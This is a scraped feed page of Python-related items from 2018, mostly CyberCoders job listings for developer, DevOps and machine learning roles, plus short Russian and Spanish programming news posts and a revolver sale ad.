proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Computer Vision / Deep Learning Engineer* *PA-Pittsburgh* *RM2-1492758*
          MapR Solutions Architect - Perficient - National, WV      Cache   Translate Page      
Design and develop open source platform components using Spark, Java, Oozie, Kafka, Python, and other components....
From Perficient - Wed, 03 Oct 2018 20:48:20 GMT - View all National, WV jobs
          (USA-IL-Chicago) Lead Python Developer      Cache   Translate Page      
Lead Python Developer Lead Python Developer - Skills Required - Flask, Python, RESTful APIs, GIT, Automated Testing If you are a Lead Python Developer with 5+ years experience, please read on! **Top Reasons to Work with Us** 1. Based in Chicago, we use data analytics to create and maintain high-performance agile development teams that deliver innovative software design for the digital enterprises. 2. Our company has been around for over a decade, so we offer a unique balance of stability and a small, tight-knit feel. 3. You will have the chance to work on exciting new development projects with a talented team. **What You Will Be Doing** - Responsible for developing application using the Python language and the Flask framework and related technologies in any Cloud technology. - Responsible for understanding the cloud technology and resolving issues during deployment and development. - Responsible for guiding the team on any issues with respective to cloud development. - Responsible for executing software development from conceptual phase to testing phase. - Design solutions that align with client's departmental and enterprise goals - Demonstrate interaction with functional prototypes. - Work within an agile environment to design user centric applications. - Monitor performance, technical strategy and propose best practices. - Produce deliverables that are consumable from any other team - Translate field research findings into design improvements. - Communicate design strategy and improvements to key stakeholders. - Collaborate with other teams to develop cross-product design solutions. - Comprehend, communicate and adhere to client's standards. - Attend required meetings and maintain open communication about project status -Understand Agile Methodology (Scrum) - Ability to work in multiple projects and guide resources with definite solution. **What You Need for this Position** - At least 5 years of proven professional development experience - Experience leading small teams - Proficient with Python - Proficient with the Flask web framework - Proficient with automated testing (JUnit, Cucumber, etc…) - Proficient with VCS (Git, SVN) - Experience with dependency management (Maven, Gradle, etc) - Experience with performance tuning enterprise applications - Experience with debugging enterprise applications - Experience with RESTful APIs - Experience with Google Cloud Platform is a strong plus - Preferred experience with Kubernetes, containers - Experience with Airflow is a plus - Understanding of CI/CD - Understanding of Object Oriented Principles - Understanding SOLID principles - Should be hands-on and should be able to do code reviews, continuous integration & validation - Proficient understanding of code versioning tools, such as Git, SVN **What's In It for You** - Competitive Salary - Unlimited Vacation within reason - PTO - Medical - Dental - Vision - Bonus - 401k So, if you are a Lead Python Developer with 5+ years experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Lead Python Developer* *IL-Chicago* *PG2-1492830*
          (USA-IL-Chicago) 50% REMOTE- Site Reliability Engineer- YEAR CONTRACT      Cache   Translate Page      
50% REMOTE- Site Reliability Engineer- YEAR CONTRACT 50% REMOTE- Site Reliability Engineer- YEAR CONTRACT - Skills Required - Python, AWS, Terraform, Puppet, Devops If you are a 50% REMOTE- Site Reliability Engineer with experience, please read on! -YEAR LONG CONTRACT **Top Reasons to Work with Us** 1. Based in Chicago, we are the first and only Customer Identity Solution. Our platform transforms the customer experience by providing contextual relevance at all points of engagement. 2. Our company has been around for over 8 years, so we offer a unique balance of stability and a small, tight-knit feel. 3. You will have the chance to work on exciting new development projects with a talented team. **What You Will Be Doing** - Work with Program Managers, Software Engineers, and Service Owners to ensure the reliability, availability, and performance of services. - Develop, improve, and maintain automation services and build systems for continuous automated testing. - Build, scale, and secure SaaS application infrastructure on multiple cloud providers - Establish policies and best practices for operational readiness and partner with development to ensure adoption - Ensure maintenance of production resource including load balancing and API gateways. - Work closely with developers during the deployment and testing phases to provide insight into operational, security, and performance considerations **What You Need for this Position** - Experience with AWS services - General linux and bash skills (especially troubleshooting issues: strace, tcpdump, telnet, nc) - Basic networking skills (understand subnets, CIDR, firewall rules) - Strong Python experience - Strong Terraform experience - Strong Packer experience - Strong Puppet experience - Familiarity with some sort of build tool would be nice (pants, buck, bazel) - CI/Build/Test tools (Jenkins, specifically) - Experience with a monitoring and alerting pipeline (we use prometheus/alertmanager as well as graphite) So, if you are a 50% REMOTE- Site Reliability Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *50% REMOTE- Site Reliability Engineer- YEAR CONTRACT* *IL-Chicago* *PG2-1492827*
          (USA-NV-Henderson) Site Reliability Engineer - Interactive Music Platform      Cache   Translate Page      
Site Reliability Engineer - Interactive Music Platform Site Reliability Engineer - Interactive Music Platform - Skills Required - Site Reliability, Kubernetes, Terraform, Automation, UNIX, Docker, Linux, Jenkins, RabbitMQ, Kafka Our company is a social music platform that utilizes proprietary BIG DATA technology to connect independent artists with music fans, industry professionals and entertainment companies. We help independent artists protect, distribute and monetize their music, while providing music fans with a platform to discover new music from emerging artists. Here's a quick summary of who we are and what we do: We use what we've learned from the music industry and artists to create products that connect them and make their lives easier. We're 20% a music company and 80% a tech company. **Top Reasons to Work with Us** We connect the music industry to artists. Every product we create helps us to accomplish that mission. We're looking for talented, like-minded team members to help us in our mission. If that's you, we're thrilled you're here. **What You Will Be Doing** - Work with Program Managers, Software Engineers, and Service Owners to ensure the reliability, availability, and performance of services. - Own projects and initiatives within the team, provide peers with technical mentorship and direction. - Participate in service capacity and demand planning/forecasting, software performance analysis, and system tuning. Tackle problems relating to mission-critical services and build automation to prevent problem recurrence; with the goal of automated response to all non-exceptional service conditions. - Identify underlying root causes and provide recommendations or solutions for long-term permanent fixes to critical production issues. - Develop effective documentation, tooling, and alerts to both identify and address reliability risks. - Participate in on-call rotation with other members of the Site Reliability Engineering Team. **What You Need for this Position** - Experience working with Unix/Linux systems from kernel to shell and beyond, with experience with system libraries, file systems, and client-server protocols. - Heavy experience in distributed systems architectures - layered, event-driven, data-centered, service mesh, etc. - Familiarity with distributed message buses such as Kafka and RabbitMQ. - The ability to read/write code fluently in any of the following: Java, Python, or Go. - Networking: experience with network theory and protocols, e.g. TCP/IP, UDP, DNS, HTTP, TLS, and load balancing. - In-depth understanding of the Software Development Process; including CI and CD pipeline architecture. - An understanding of cloud orchestration frameworks, enterprise IT service provisioning tools, and their role in IT transformation. - Experience with the public and private cloud, including OpenStack, AWS, and Google Cloud Platform. - Familiarity with service configuration and deployment tools, such as Ansible, Consul, Jenkins, Terraform, and Vault. - Experience with container technologies such as Docker and Kubernetes. - Strong interpersonal and communication skills. **What's In It for You** Benefits and...all the good stuff... - $110,000-$130,000 Base - Opportunity to contribute as part of the founding team responsible in creating our innovative music platform that helps the music industry connect with artists in ways that have never been done before. - Opportunities to work and interact directly with our founders, board members and senior executive team. - Career advancement opportunities: As an emerging company experiencing rapid growth, our company provides the perfect environment for an employee to define and achieve their ideal desired professional career path. - Well funded: Series B funding round has been well received and over subscribed. - Proven and experienced management team and board with startup and liquidity experience. - Typical startup perks such as car washes, regular team lunches, company events, complimentary snacks and drinks, etc… - Stock ownership opportunities - Comfortable, productive and creative workspaces including lounges, quiet areas and kitchen. - Casual dress code - Flexible work schedule - Agile development environment - Patented technologies So, if you are a Site Reliability Engineer - Interactive Music Platform with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Site Reliability Engineer - Interactive Music Platform* *NV-Henderson* *PM5-1492855*
          (USA-OH-Columbus) Senior DevOps Engineer      Cache   Translate Page      
Senior DevOps Engineer Senior DevOps Engineer - Skills Required - Devops, AWS, Cloud, Agile, Build and CI automation tools, Scripting languages- Python/Bash/Go, Docker Containers/containers, Linux System Administration, Collaboration tools - Jira/Confluence/Slack If you are a DevOps Engineer with 5+ years of experience, please read on! --CANDIDATES WHO FILL OUT THE SKILLS AND QUESTIONS PORTION OF THE APPLICATION WILL RECEIVE TOP PRIORITY-- With our HQ in Europe, and multiple offices in the US, we are a leading developer, manufacturer and supplier of RFID products and IoT solutions. In other words...we make products that help businesses identify, authenticate, track and complement product offerings. We are growing at an extremely high rate and are looking to add a talented Senior DevOps Engineer in our Columbus, OH office who has over 5 years of relevant experience, with strong AWS and Automation experience. The engineer will create cloud formation templates to build AWS services and maintain development, staging, demo, and production environments. This is a unique, special opportunity to get in early with a rapidly growing company. Sound like you? Email your most updated resume ASAP to neda.talebi@cybercoders.com! **What You Will Be Doing** - Review and analyze existing cloud applications (AWS) - Design and implement solutions and services in the cloud - Provide guidance and expertise on DevOps, migrations, and cloud technologies to developers and in some cases partners or customers - Be devoted to knowing the latest trends in the Cloud space and solutions - Demonstrated usage of Agile and DevOps processes and activities on project execution - Ability to use wide variety of open source technologies and cloud services - Experience w/ automation and configuration management w/in DevOps environment **What You Need for this Position** - 5+ years relevant experience - Strong demonstrated usage of Agile and DevOps processes on project execution - Strong AWS experience - Previous experience maintaining applications in the cloud - required - Strong knowledge of Build & CI automation tools - Strong knowledge of docker containerization - Strong knowledge of source code management tools & artifact management (GitHub) - Good knowledge of scripting languages - Python, Bash, Go - Good knowledge of linux system administration - Good knowledge of infrastructure as Code - AWS CloudFormation - General knowledge of collaboration tools - Jira, Confluence, Slack - Strong communication skills - Strong problem solving skills - Takes initiative/lead by example -AWS certification is a plus! **What's In It for You** - Competitive base salary (DOE) - PTO - Health insurance - top of the line - 401k w/ matching - Huge room for growth - Unique, special opportunity to get in early with a growing company So, if you are a DevOps Engineer with 5+ years of experience, please apply today! --CANDIDATES WHO FILL OUT THE SKILLS AND QUESTIONS PORTION OF THE APPLICATION WILL RECEIVE TOP PRIORITY-- Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior DevOps Engineer* *OH-Columbus* *NT2-1492892*
          [Перевод] Data Science в Visual Studio Code с использованием Neuron      Cache   Translate Page      
Сегодня у нас небольшой рассказ о Neuron, расширении для Visual Studio Code, которое является настоящей киллер-фичей для дата-сайнтистов. Оно позволяет совместить Python, любую библиотеку машинного обучения и Jupyter Notebooks. Подробнее под катом!

Читать дальше →
          Este manual quiere que aprendas el 80% de todo JavaScript en 20% del tiempo      Cache   Translate Page      

Este manual quiere que aprendas el 80% de todo JavaScript en 20% del tiempo#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Si eres desarrollador o estás aprendiendo a programar y te interesa educarte en las bondades de JavaScript, uno de los lenguajes de programación más ampliamente utilizados más allá incluso del navegador, este manual te va a interesar.

Cortesía de Flavio Copes, un ingeniero en computación que escribe tutoriales para otros programadores y que lleva un buen tiempo ofreciendo entrenamiento en JavaScript, tenemos este eBook bautizado como "El manual completo de JavaScript".

De cero a programador especializado

El manual, que puedes consultar online, o descargar en PDF, ePUB, o Mobi simplemente suscribiéndote al newsletter de Flavio, explica JavaScript desde cero y busca ofrecerte todos los fundamentos necesarios para ser un programador en JavaScript habilidoso y eficiente.

Javascript Handbook

Como explica su creador, este manual sigue la regla 80/20, es decir, busca que el estudiante aprenda el 80% de JavaScript en 20% del tiempo. Sus contenidos abarcan desde las definiciones básicas, hasta variables, tipos, clases, excepciones, estilo de código, estructuras, eventos, loops, operadores matemáticos, etc.

Este libro ha sido compartido a través del blog de Medium de freeCodeCamp, una de nuestras plataformas online favoritas para aprender programación, y una que siempre comparte recursos adicionales para todo el que desee aprender sobre las ciencias de la computación.

Si te resulta útil este manual y te enamoras de JavaScript, quizás te interese combinarlo con el programa de estudios completo de JavaScript en freeCodeCamp, que tiene una duración de 300 horas y ofrece certificación completamente gratuita.


          (USA-TX-Austin) Senior Full-Stack Engineer - Rapidly Growing Tech Startup      Cache   Translate Page      
Senior Full-Stack Engineer - Rapidly Growing Tech Startup Senior Full-Stack Engineer - Rapidly Growing Tech Startup - Skills Required - REACT, Angular, JavaScript, MVC, Vue, GIT, No-SQL, NODE, PHP, Node.js If you are a Senior Full-Stack Engineer with experience, please read on! **Top Reasons to Work with Us** 1. Based in Austin, we are a rapidly growing Tech startup company. 2. Opportunity to work on a fast-paced team in a startup environment. 3. You will get the chance to work on exciting new projects. **What You Will Be Doing** - Our engineering team is innovating every day — tackling some of the gnarliest problems out there at the intersection of eCommerce and big data — and we're looking for a few good coders to join us. - After getting ramped up, you'll be expected to dive into our stack and start shipping code. - Contribute product ideas as well as code. **What You Need for this Position** - Full Stack engineering knowledge with any server-side language and JavaScript (on both client and server) - Experience with object oriented MVC frameworks - Source Control (git) - Familiar with Frontend frameworks (Angular, React, Vue) - Ability to contribute in monolithic and microservice architectures - At least 4 years of relevant experience - Proficient in Relational and No-SQL concepts - Understands the Agile process - Python - Node.js - React - C# **What's In It for You** - Competitive Base Salary ($90k-$120k) - Medical/Dental/Vision coverage - 401k - Vacation/PTO - Tuesdays / Fridays are optional WFH days - Life Insurance - Short and Long term Disability So, if you are a Senior Full-Stack Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Full-Stack Engineer - Rapidly Growing Tech Startup* *TX-Austin* *KC9-1492771*
          (USA-CA-Los Angeles) OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE      Cache   Translate Page      
OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE - Skills Required - Python, Openstack, Cloud, Infrastructure, Djangp, Flask, SaltStack, Salt Stack, Open Stack, KVM If you are a OpenStack Cloud Developer with experience, please read on! Title: OpenStack Cloud Developer Location: WORK FROM HOME | 100% REMOTE Hourly Wage: Contract | Depending on experience We are a national leader in high performance SSD virtual servers looking for a developer with a deep understanding of virtualization and web technologies. Our company builds and maintains our in-house systems leveraging an OpenStack cloud environment. You will collaborate with our team to design, build, and maintain our in-house systems as we transition into the cloud. **What You Need for this Position** - Python - Openstack - Flask - KVM **What's In It for You** - Competitive base salary and overall compensation package - Full benefits: Medical, Dental, Vision - 401 (K) with generous company match - Generous Paid time off (PTO) - Vacation, sick, and paid holidays - Life Insurance coverage 1. Apply directly to this job opening here! Or 2. E-mail directly for more information to James@CyberCoders.com Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE* *CA-Los Angeles* *JT7-1492905*
          (USA-WA-Seattle) OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE      Cache   Translate Page      
OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE - Skills Required - Python, Openstack, Cloud, Infrastructure, Djangp, Flask, SaltStack, Salt Stack, Open Stack, KVM If you are a OpenStack Cloud Developer with experience, please read on! Title: OpenStack Cloud Developer Location: WORK FROM HOME | 100% REMOTE Hourly Wage: Contract | Depending on experience We are a national leader in high performance SSD virtual servers looking for a developer with a deep understanding of virtualization and web technologies. Our company builds and maintains our in-house systems leveraging an OpenStack cloud environment. You will collaborate with our team to design, build, and maintain our in-house systems as we transition into the cloud. **What You Need for this Position** - Python - Openstack - Flask - KVM **What's In It for You** - Competitive base salary and overall compensation package - Full benefits: Medical, Dental, Vision - 401 (K) with generous company match - Generous Paid time off (PTO) - Vacation, sick, and paid holidays - Life Insurance coverage 1. Apply directly to this job opening here! Or 2. E-mail directly for more information to James@CyberCoders.com Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE* *WA-Seattle* *JT7-1492915*
          (USA-NY-New York City) OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE      Cache   Translate Page      
OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE - Skills Required - Python, Openstack, Cloud, Infrastructure, Djangp, Flask, SaltStack, Salt Stack, Open Stack, KVM If you are a OpenStack Cloud Developer with experience, please read on! Title: OpenStack Cloud Developer Location: WORK FROM HOME | 100% REMOTE Hourly Wage: Contract | Depending on experience We are a national leader in high performance SSD virtual servers looking for a developer with a deep understanding of virtualization and web technologies. Our company builds and maintains our in-house systems leveraging an OpenStack cloud environment. You will collaborate with our team to design, build, and maintain our in-house systems as we transition into the cloud. **What You Need for this Position** - Python - Openstack - Flask - KVM **What's In It for You** - Competitive base salary and overall compensation package - Full benefits: Medical, Dental, Vision - 401 (K) with generous company match - Generous Paid time off (PTO) - Vacation, sick, and paid holidays - Life Insurance coverage 1. Apply directly to this job opening here! Or 2. E-mail directly for more information to James@CyberCoders.com Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE* *NY-New York City* *JT7-1492914*
          (San Francisco) Colt Python 6" 357 Mag Mirror Royal Blue Finish with Box - $ 2,150      Cache   Translate Page      
Factory Fired Only Mint Condition & Looks Like It Just Left The Colt Factory Factory Deep Dark Mirror Royal Blue Finish
Excellent Factory Tuned Action,Excellent Bore and Chamber,Beautiful Factory Checkered Walnut Grips,Mint 1976 - 41 Years Old
          (USA-CA-San Francisco) OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE      Cache   Translate Page      
OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE - Skills Required - Python, Openstack, Cloud, Infrastructure, Djangp, Flask, SaltStack, Salt Stack, Open Stack, KVM If you are a OpenStack Cloud Developer with experience, please read on! Title: OpenStack Cloud Developer Location: WORK FROM HOME | 100% REMOTE Hourly Wage: Contract | Depending on experience We are a national leader in high performance SSD virtual servers looking for a developer with a deep understanding of virtualization and web technologies. Our company builds and maintains our in-house systems leveraging an OpenStack cloud environment. You will collaborate with our team to design, build, and maintain our in-house systems as we transition into the cloud. **What You Need for this Position** - Python - Openstack - Flask - KVM **What's In It for You** - Competitive base salary and overall compensation package - Full benefits: Medical, Dental, Vision - 401 (K) with generous company match - Generous Paid time off (PTO) - Vacation, sick, and paid holidays - Life Insurance coverage 1. Apply directly to this job opening here! Or 2. E-mail directly for more information to James@CyberCoders.com Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE* *CA-San Francisco* *JT7-1492916*
          (USA-CA-Oakland) Principal Python Engineer      Cache   Translate Page      
Principal Python Engineer (APIs, Distributed Systems) Principal Python Engineer (APIs, Distributed Systems) - Skills Required - Python, gRPC, Tornado, C, RabbitMQ, AWS, SQL, Kubernetes, Docker If you are a Principal Python Engineer needed immediately with experience, please read on! **What You Will Be Doing** As an integral member of the backend team, you'll participate in architecture sessions and provide valuable input, while also learning from the senior members of the team. You'll be expected to design, implement, and maintain APIs that are well-tested, well-documented, and maintainable. You like coding clean, and take deadlines seriously. You'll also have plenty of mentorship opportunities, and will be expected to constantly learn and push your own technical boundaries. **What You Need for this Position** -Experience building and maintaining APIs. -Solid knowledge of Python from a backend/object-oriented perspective (not just data science or scripting) -Experience with SQL databases. -Awareness of concepts related to distributed systems (e.g. message queues, asynchronous tasks, pub-sub systems). -Proficient in at least one compiled and one interpreted language. Nice to have: -Experience in C, AWS, Kubernetes -Experience with cryptography or blockchain Our key technologies: -Backend: Python (gRPC, Tornado), C, postgresql, RabbitMQ -Infrastructure: AWS, Kubernetes, Docker -OS: Linux **What's In It for You** -The opportunity to join a well-funded, cutting-edge financial technology company at a very early stage -Competitive salary and equity -Competitive medical benefits -401k -Flexible working policies: we work twice a week from home -Smart coworkers who are world class experts in the field of cryptography So, if you are a Principal Python Engineer needed immediately with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Principal Python Engineer* *CA-Oakland* *JG2-1493050*
          (USA-CA-San Mateo) Senior Full Stack Engineer      Cache   Translate Page      
Senior Full Stack Engineer (High Growth Start-up) Senior Full Stack Engineer (High Growth Start-up) - Skills Required - REACT, Django, SQL, Python 3, APIs, JavaScript, CSS, JQuery High growth Start-up in San Mateo is seeking a Full Stack guru. **What You Will Be Doing** You will be our Full Stack extraordinaire! You will Understand our product from the user's point of view and write the code to support the product (or modify the product to better support the code!) **What You Need for this Position** Experience building the backend service of a web application Expert-level experience in at least one language (Python 3 preferred), and general experience a diversity of languages (statically- vs dynamically-typed languages, functional languages, languages with interesting features) Familiarity with server-side MVC frameworks (Django preferred) Familiarity with SQL databases and basic optimizations for efficient queries Strong sense of domain modeling and a desire to take complex requirements and reduce them to simpler systems Nice to Have Strong frontend engineering skills and experience with modern JavaScript or CSS frameworks (more than just JQuery!) Experience working in a product-oriented team and designing with the user in mind Advanced knowledge of database optimization and administration Devops experience with managing cloud infrastructure **What's In It for You** We offer a competitive compensation package that includes flexible paid time off, health, vision and dental benefits, 401(k) plan, employee stock option program, and much more. If you want to join forces with one of the most promising start ups in the Bay area, please apply. Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Full Stack Engineer* *CA-San Mateo* *JG2-1493042*
          (USA-CA-Oakland) Senior DevOps Engineer      Cache   Translate Page      
Senior DevOps Engineer (Python, AWS) Senior DevOps Engineer (Python, AWS) - Skills Required - Python, AWS, JavaScript, Kubernetes, Docker, Chef, Jenkins, SQL As the second member of the DevOps team, you'll manage availability of all our AWS services and support engineering through operations, automation, consultation, tooling, research and education. You are capable of advising on architectural decisions for these services through a deep understanding of systems internals. You'll own all aspects of our AWS relationship, including provisioning, monitoring, security and connectivity. **What You Need for this Position** -Deep experience with AWS, including RDS, ElastiCache, Kinesis, SQS, EC2. -A good grasp of distributed systems, and the issues that go along with it. -Solid experience in Python Nice to have: -Experience with cryptography or blockchain Our key technologies: -Backend: Python (gRPC, Tornado), C, postgresql, RabbitMQ -Infrastructure: AWS, Kubernetes, Docker -OS: Linux **What's In It for You** -The opportunity to join a well-funded, cutting-edge financial technology company at a very early stage -Competitive salary and equity -Competitive medical benefits -401k -Flexible working policies: we work twice a week from home -Smart coworkers who are world class experts in the field of cryptocurrency So, if you are a Senior DevOps Engineer (Python, AWS) with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior DevOps Engineer* *CA-Oakland* *JG2-1493045*
          (USA-CA-San Jose) Senior Field Engineer      Cache   Translate Page      
Senior Field Engineer (Rapid Prototyping, Coding) Senior Field Engineer (Rapid Prototyping, Coding) - Skills Required - Prototype Code, JavaScript, Python, Go, Testing If you are a Senior Field Engineer with experience shipping prototype code quickly, working with end clients, please apply today. **What You Need for this Position** At Least 3 Years of experience and knowledge of: - Prototype Code - JavaScript - Python - Go - Testing **What's In It for You** Competitive salary Stock Options Health, dental, and vision insurance 401k benefits Diverse, passionate, and skilled co-workers Casual working environment Weekly company lunches Quarterly company outings Flexible PTO Discounted Pet Insurance Disability and Life Insurance Commuter Benefits, Retirement Plans, and Shopping discounts So, if you are a Senior Field Engineer (Rapid Prototyping, Coding) with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Field Engineer* *CA-San Jose* *JG2-1493057*
          (USA-MO-St. Louis) Full Stack Developer      Cache   Translate Page      
Full Stack Developer Full Stack Developer - Skills Required - Python, React/Redux, Express/Electron, JavaScript, Semantic UI, Bootstrap, Data Analysis, PostgreSQL, Django, Flask If you are a Full Stack Javascript Developer with Python experience, you'll want to read this... We are a rapidly growing software startup headquartered in downtown Saint Louis. Using machine learning and speech-to-text AI technologies, we have created a product that transcribes and analyzes sales and customer service calls in real time to deliver live recommendations to representatives while they navigate their calls. We are looking for a Full Stack Engineer to join our exciting and rapidly growing team in Downtown St. Louis. **What You Will Be Doing** You will be creating, evolving, and maintaining our infrastructure which includes our desktop and web applications, cloud processing module, and transcription engine. **What You Need for this Position** - Full Stack Development - Javascript (React/Redux & Express/Electron) - Python (Flask, Tornado, Django, GRPC) - CSS (Semantic UI/Bootstrap) - PostgreSQL - Data Analysis **What's In It for You** - Competitive compensation with equity - Generous benefits package with the works - Work for a stable, rapidly growing company - Step into a high impact role - Relocation assistance available if needed - Surround yourself with top industry talent - Awesome office location in Downtown STL Incubator So, if you are a Full Stack Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Full Stack Developer* *MO-St. Louis* *GR1-1492920*
          (USA-WA-Bellevue) Machine Learning Scientist - NLP, Recommender/Ranking Systems      Cache   Translate Page      
Machine Learning Scientist - NLP, Recommender/Ranking Systems Machine Learning Scientist - NLP, Recommender/Ranking Systems - Skills Required - Machine Learning, NLP, Recommender Systems, Python, Deep Learning Theory, Hadoop, SPARK, Building Data Pipelines If you are a Machine Learning Scientist with experience, please read on! One of the largest and most well-known travel agencies is looking for a Machine Learning Scientist. We are an online travel agency that enables users to access a wide range of services. We books airline tickets, hotel reservations, car rentals, cruises, vacation packages, and various attractions and services via the world wide web and telephone travel agents. Our team helps power many of the features on our website. We design and build models that help our customers find what they want and where they want to go. As a member of our group, your contributions will affect millions of customers and will have a direct impact on our business results. You will have opportunities to collaborate with other talented data scientists and move the business forward using novel approaches and rich sources of data. If you want to resolve real-world problems using state-of-the-art machine learning and deep learning approaches, in a stimulating and data-rich environment, lets talk. **What You Will Be Doing** You will provide technical leadership and oversight, and mentor junior machine learning scientists You will understand business opportunities, identify key challenges, and deliver working solutions You will collaborate with business partners, program management, and engineering team partners You will communicate effectively with technical peers and senior leadership **What You Need for this Position** At Least 3 Years of experience and knowledge of: - PhD (MS considered) in computer science or equivalent quantitative fields with 3+ years of industry or academic experience - Expertise in NLP or recommender systems (strongly preferred) - Deep understanding of classic machine learning and deep learning theory, and extensive hands-on experience putting it into practice - Excellent command of Python and related machine learning/deep learning tools and frameworks - Strong algorithmic design skills - Experience working in a distributed, cloud-based computing environment (e.g., Hadoop or Spark) - Experience building data pipelines and working with live data (cleaning, visualization, and modeling) **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Bonus - 401k So, if you are a Machine Learning Scientist with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Machine Learning Scientist - NLP, Recommender/Ranking Systems* *WA-Bellevue* *GK2-1493004*
